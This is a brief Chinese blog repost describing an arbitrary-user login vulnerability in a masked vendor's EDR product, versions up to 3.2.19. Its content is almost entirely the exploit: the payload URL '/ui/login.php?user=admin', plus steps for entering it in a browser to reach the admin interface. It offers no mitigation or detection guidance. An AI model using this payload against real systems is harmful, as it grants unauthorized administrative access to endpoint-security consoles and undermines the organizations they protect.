暂无
某某服EDR任意用户登录漏洞
EDR<= v3.2.19
攻击者可以通过构造payload绕过登录判断
/ui/login.php?user=admin
找到一个
浏览器直接输入
url输入payload 成功进入
http://ip/ui/login.php?user=admin (大概是这样的)
可以看到直接进来了
本文分享自 White OWL 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!